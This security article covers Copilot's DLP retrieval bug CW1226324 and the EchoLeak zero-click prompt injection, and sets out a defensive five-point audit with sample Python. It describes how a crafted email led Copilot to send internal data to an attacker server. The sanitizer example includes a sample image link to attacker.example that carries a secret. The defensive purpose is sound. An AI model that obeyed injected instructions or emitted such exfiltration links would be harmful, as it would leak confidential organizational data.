
For four weeks starting on January 21, Microsoft's Copilot read and summarized confidential emails, despite every sensitivity label and DLP policy requiring it not to. The enforcement point broke inside Microsoft's own pipeline, and no security tool in the stack flagged it. Affected organizations included the UK's National Health Service, which logged it as INC46740412 – an indication of how far the failure reached into regulated healthcare environments. Microsoft tracked it as CW1226324.
The advisory, first reported by BleepingComputer on February 18, marks the second time in eight months that Copilot's retrieval pipeline has breached its own trust boundary – a failure in which the AI system accessed or transmitted data it was explicitly prohibited from touching. The first was even worse.
In June 2025, Microsoft patched CVE-2025-32711, a critical zero-click vulnerability that Aim Security researchers dubbed "EchoLeak". A malicious email could slip past Copilot's prompt injection classifier, its link redaction, and its content security policy, and quietly exfiltrate enterprise data. No clicks and no user action were required. Microsoft gave it a CVSS score of 9.3.
Two different root causes, one blind spot: a code error and a sophisticated exploit chain produced the same result. Copilot processed data it was explicitly prohibited from touching, and nothing in the security stack saw it.
Why EDR and WAF remain architecturally blind to this
Endpoint Detection and Response (EDR) monitors file and process behavior. Web application firewalls (WAFs) inspect HTTP payloads. Neither has a detection category for "your AI assistant has violated its own trust boundary." The gap exists because the LLM retrieval pipeline sits behind an enforcement layer that traditional security tools were never designed to inspect.
Copilot ingested a labeled email it was supposed to exclude, and the entire action took place inside Microsoft's infrastructure, between the retrieval index and the generation model. Nothing dropped to disk, no unusual traffic crossed the perimeter, and no process appeared for the endpoint agent to flag. The security stack reported completely clean because it never looked at the layer where the breach occurred.
The CW1226324 bug worked because a code-path error allowed sent items and draft messages to enter Copilot's retrieval set despite sensitivity labels and DLP rules that should have blocked them, according to Microsoft's advisory. EchoLeak worked because Aim Security researchers proved that a malicious email, crafted to look like normal business correspondence, could manipulate Copilot's retrieval-augmented generation pipeline into accessing and transmitting internal data to an attacker-controlled server.
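Microsoft has not published the faulty code path, so the sketch below is a hypothetical reconstruction of the failure class, not Microsoft's implementation: a retrieval filter that short-circuits on folder type before the sensitivity-label and DLP checks run, so sent items and drafts slip into the retrieval set unchecked. All names (`RetrievalItem`, `is_retrievable_buggy`) are illustrative.

```python
from dataclasses import dataclass

@dataclass
class RetrievalItem:
    folder: str              # e.g. "Inbox", "SentItems", "Drafts"
    sensitivity_label: str   # e.g. "Confidential", "General"
    dlp_blocked: bool        # True if a DLP rule excludes this item

BLOCKED_LABELS = {"Confidential", "Highly Confidential"}

def is_retrievable_buggy(item: RetrievalItem) -> bool:
    """Hypothetical buggy filter: the early return for sent items and drafts
    skips the label and DLP checks, so restricted content enters the set."""
    if item.folder in ("SentItems", "Drafts"):
        return True  # BUG: enforcement never runs for these folders
    if item.sensitivity_label in BLOCKED_LABELS or item.dlp_blocked:
        return False
    return True

def is_retrievable_fixed(item: RetrievalItem) -> bool:
    """Enforcement first: labels and DLP rules apply to every folder,
    which is what the configured policy promised."""
    if item.sensitivity_label in BLOCKED_LABELS or item.dlp_blocked:
        return False
    return True

if __name__ == "__main__":
    leaked = RetrievalItem("SentItems", "Confidential", dlp_blocked=True)
    print(is_retrievable_buggy(leaked))  # True  -> labeled mail reaches the model
    print(is_retrievable_fixed(leaked))  # False -> policy actually enforced
```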
Researchers at Aim Security describe this as a fundamental design flaw: agents process trusted and untrusted data in the same thought process, making them structurally vulnerable to manipulation. That design flaw didn’t disappear when Microsoft patched EchoLeak. CW1226324 proves that the enforcement layer around it can fail independently.
A five-point audit that maps to both failure modes
Neither failure generated a single alert. Both were discovered through vendor advisory channels – not through SIEM, not through EDR, not through WAF.
CW1226324 went public on February 18. Affected tenants were exposed starting January 21. Microsoft has not disclosed how many organizations were affected or what data was accessed during that window. For security leaders, that gap is the story: a four-week exposure inside a vendor's inference pipeline, invisible to every tool in the stack, discovered only because Microsoft chose to publish an advisory.
1. Test DLP enforcement directly against Copilot. CW1226324 existed for four weeks because no one tested whether Copilot actually respected the sensitivity labels on sent items and drafts. Create labeled test messages in controlled folders, query Copilot, and confirm that it cannot surface them. Run this test monthly. Configuration is not enforcement; the only proof is a failed retrieval attempt.
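One way to run that monthly check is a canary test: plant labeled messages containing unique marker strings, ask Copilot about the topic, and fail the test if any marker appears in the answer. A minimal sketch, assuming a `query_copilot()` helper wired to whatever chat interface your tenant exposes; the helper, the marker values, and the prompt are placeholders, not a documented API.

```python
import datetime

# Canary markers embedded in labeled test messages planted in controlled
# folders (Sent Items, Drafts, a restricted SharePoint site, ...).
CANARIES = {
    "dlp-canary-7f3a": "Confidential label, Sent Items",
    "dlp-canary-9c21": "Highly Confidential label, Drafts",
}

def query_copilot(prompt: str) -> str:
    """Placeholder: wire this to your tenant's Copilot chat interface
    (Graph-based integration or UI automation). Hypothetical helper."""
    raise NotImplementedError

def run_monthly_dlp_test() -> bool:
    """Return True only if Copilot surfaces none of the canary markers."""
    passed = True
    answer = query_copilot(
        "Summarize everything you can find about project dlp-canary."
    )
    for marker, description in CANARIES.items():
        if marker in answer:
            passed = False
            print(f"FAIL: Copilot surfaced {description} ({marker})")
    print(f"{datetime.date.today()} DLP retrieval test:",
          "PASS" if passed else "FAIL")
    return passed
```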
2. Block external content from entering Copilot's context window. EchoLeak succeeded because a malicious email entered Copilot's retrieval set and its injected instructions were executed as if they were the user's query. According to Aim Security's disclosure, the attack bypassed four defense layers: Microsoft's cross-prompt injection classifier, external link redaction, content-security-policy controls, and context mention protections. Disable external email context in Copilot settings, and restrict Markdown rendering in AI output. This addresses the prompt-injection class of failure by removing the attack surface entirely.
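Restricting Markdown rendering can be applied at display time, before Copilot output reaches the user or any component that auto-fetches URLs. A minimal sketch, assuming you control the rendering layer: strip Markdown images and flatten external links, the kind of output channel link-based exfiltration relies on.

```python
import re

# Markdown image syntax: ![alt](url) - images auto-fetch their URL when
# rendered, which can turn a crafted response into exfiltration.
MD_IMAGE = re.compile(r"!\[[^\]]*\]\([^)]*\)")
# Markdown link syntax: [text](url) - keep the text, drop the URL.
MD_LINK = re.compile(r"\[([^\]]*)\]\([^)]*\)")

def sanitize_ai_output(text: str) -> str:
    """Render AI output as plain text: remove images, flatten links."""
    text = MD_IMAGE.sub("[image removed]", text)
    text = MD_LINK.sub(r"\1", text)
    return text

print(sanitize_ai_output(
    "Quarterly summary ![x](https://attacker.example/leak?d=secret) "
    "see [the report](https://attacker.example/r)."
))
# -> "Quarterly summary [image removed] see the report."
```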
3. Audit logs for anomalous Copilot interactions during the January-to-February exposure window. Look for Copilot chat queries that returned content from labeled messages between January 21 and mid-February 2026. Neither failure class generated alerts through existing EDR or WAF, so retrospective detection depends on Purview audit telemetry. If your tenant cannot reconstruct what Copilot accessed during the exposure window, document that gap formally. It matters for compliance. For any organization under regulatory scrutiny, an unexplained AI data-access gap during a known vulnerability window is an audit finding waiting to happen.
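If you can export the unified audit log for the window, a quick pass like the sketch below narrows the review to Copilot interactions inside the exposure dates. It assumes a CSV export with a timestamp column, an operation column, and a JSON detail column; the column names, operation name, and detail fields shown here are assumptions, so adjust them to match your tenant's actual export schema.

```python
import csv
import json
from datetime import datetime, timezone

WINDOW_START = datetime(2026, 1, 21, tzinfo=timezone.utc)
WINDOW_END = datetime(2026, 2, 18, tzinfo=timezone.utc)

def copilot_events(export_path: str):
    """Yield Copilot-related records from an audit log CSV export that
    fall inside the exposure window. Column names are assumptions."""
    with open(export_path, newline="", encoding="utf-8-sig") as fh:
        for row in csv.DictReader(fh):
            if "copilot" not in row.get("Operations", "").lower():
                continue
            when = datetime.fromisoformat(
                row["CreationDate"].replace("Z", "+00:00")
            )
            if when.tzinfo is None:          # treat naive timestamps as UTC
                when = when.replace(tzinfo=timezone.utc)
            if WINDOW_START <= when <= WINDOW_END:
                yield when, json.loads(row.get("AuditData", "{}"))

for when, details in copilot_events("audit_export.csv"):
    print(when.isoformat(), details.get("UserId"))
```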
4. Turn on Restricted Content Discovery for SharePoint sites that hold sensitive data. RCD removes those sites from Copilot's retrieval pipeline entirely. It works regardless of whether the trust violation comes from a code bug or an injected prompt, because the data never enters the context window in the first place. This is a prevention layer that does not depend on the enforcement point that broke. For organizations handling sensitive or regulated data, RCD is not optional.
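Deciding which sites get RCD is mostly an inventory exercise. A minimal sketch, assuming you maintain or export a site inventory with a classification column; the file and column names here are placeholders, not a Microsoft export format.

```python
import csv

SENSITIVE_CLASSES = {"Confidential", "Highly Confidential", "Regulated"}

def rcd_candidates(inventory_csv: str) -> list[str]:
    """Return SharePoint site URLs whose classification calls for
    Restricted Content Discovery. Assumes 'SiteUrl' and 'Classification'
    columns - adjust to whatever your inventory actually contains."""
    with open(inventory_csv, newline="", encoding="utf-8") as fh:
        return [
            row["SiteUrl"]
            for row in csv.DictReader(fh)
            if row.get("Classification") in SENSITIVE_CLASSES
        ]

for url in rcd_candidates("sharepoint_inventory.csv"):
    print("Enable RCD:", url)
```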
5. Create an incident response playbook for vendor-hosted inference failures. The incident response (IR) playbook needs a new category: trust boundary violations inside the vendor's inference pipeline. Define escalation paths. Assign ownership. Establish a monitoring cadence for vendor service health advisories that affect AI processing. Your SIEM will not catch the next one either.
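The playbook entry can be as lightweight as a structured record plus a recurring keyword check against the vendor's service health advisories. The sketch below is a generic pattern, not tied to any specific Microsoft API; the keyword list, owner, and escalation steps are assumptions to adapt.

```python
from dataclasses import dataclass, field

AI_KEYWORDS = ("copilot", "inference", "retrieval", "grounding", "dlp")

@dataclass
class VendorTrustBoundaryPlaybook:
    """IR playbook entry for trust boundary violations inside a
    vendor-hosted inference pipeline."""
    owner: str                    # who leads the response
    escalation_path: list = field(default_factory=lambda: [
        "Security on-call", "CISO", "Legal / DPO", "Regulator notification"])
    review_cadence_days: int = 7  # how often advisories are reviewed

def ai_related(advisory_title: str) -> bool:
    """Flag advisories that touch AI processing for playbook review."""
    title = advisory_title.lower()
    return any(keyword in title for keyword in AI_KEYWORDS)

playbook = VendorTrustBoundaryPlaybook(owner="Cloud security lead")
for title in ("CW1226324: Copilot may summarize labeled items",
              "Planned maintenance: Exchange Online"):
    if ai_related(title):
        print(f"Escalate to {playbook.owner}: {title}")
```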
The pattern transfers beyond Copilot
A 2026 survey by Cybersecurity Insiders found that 47% of CISOs and senior security leaders have already observed AI agents exhibit unexpected or unauthorized behavior. Organizations are deploying AI assistants in production faster than they can build governance around them.
That trajectory matters because this failure pattern is not Copilot-specific. Any RAG-based assistant pulling from enterprise data runs through the same pipeline: a retrieval layer selects content, an enforcement layer gates what the model can see, and a generation layer produces output. If the enforcement layer fails, the retrieval layer feeds restricted data into the model, and the security stack never sees it. Copilot, Gemini for Workspace, and any tool with retrieval access to internal documents carry the same structural risk.
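The three-layer shape is worth making concrete, because it shows exactly why the security stack has nothing to observe. A minimal, vendor-agnostic sketch of the pattern; every function and field name is illustrative.

```python
def retrieve(query: str, index: list[dict]) -> list[dict]:
    """Retrieval layer: select candidate documents from the index."""
    return [doc for doc in index if query.lower() in doc["text"].lower()]

def enforce(docs: list[dict]) -> list[dict]:
    """Enforcement layer: drop anything policy forbids. This is the single
    gate between restricted data and the model - if it fails open,
    nothing downstream notices."""
    return [doc for doc in docs if not doc.get("restricted", False)]

def generate(docs: list[dict], query: str) -> str:
    """Generation layer: the model only sees what enforcement passed."""
    return f"Answer to {query!r} grounded in {len(docs)} document(s)."

index = [
    {"text": "Q3 budget draft", "restricted": True},
    {"text": "Q3 budget town hall notes", "restricted": False},
]

# Healthy pipeline: the restricted draft is filtered out before generation.
print(generate(enforce(retrieve("budget", index)), "Q3 budget"))

# Broken enforcement (fails open): the restricted draft reaches the model.
# No file is written, no packet leaves the perimeter - EDR and WAF see nothing.
print(generate(retrieve("budget", index), "Q3 budget"))
```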
Run the five-point audit before your next board meeting. Start with labeled test messages in a controlled folder. If Copilot surfaces them, every policy beneath them is theater.
Board response: "Our policies were configured correctly. Enforcement failed inside the vendor's inference pipeline. Here are the five controls we are testing, restricting, and demanding from the vendor before re-enabling full access for sensitive workloads."
The next failure will not send an alert.